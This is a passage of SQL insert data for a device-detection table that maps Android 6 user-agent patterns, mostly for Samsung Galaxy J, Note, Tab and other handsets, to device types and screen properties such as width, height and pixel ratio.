Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-J510GN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-J510H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-J510L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-J510MN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-J510S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-J510UN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-J610F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-J7 pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-J700F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-J700H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-J700M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-J700P) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-J700T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-J700T1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-J7108) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-J710F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-J710FQ) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-J710GN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-J710MN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-J730F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-N9100) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-N910C) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-N910F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-N910G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-N910H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-N910K) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-N910L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-N910P) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-N910S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-N910T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-N910T3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-N910U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-N910V) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-N910W8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-N915F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":400,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-N915FY) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":400,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-N915G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":400,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-N915S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":400,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-N915T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":400,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-N915V) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":400,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-N916K) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-N916L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-N916S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-N9208) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-N920A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-N920C) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-N920F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-N920G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-N920I) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-N920P) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-N920T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-N920V) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-N930F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-N950F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-P350) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_p','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":768,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-S120VL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_s','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-S320VL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_s','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-S327VL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_s','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-S550TL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_s','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-S727VL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_s','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-S903VL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_s','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-S907VL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_s','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-T350) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":768,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-T550) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":768,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-T580) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-T585) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-T700) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-T705) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-T800) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-T805) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-T810) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":768,\"screenHeight\":1024,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SMART Surf2 4G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SMART_PLUS) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SMD-4026B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SO-01G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SO-01H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SO-01J) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SO-02G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SO-02H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SO-02J) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SO-03G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SO-03H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SO-04G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 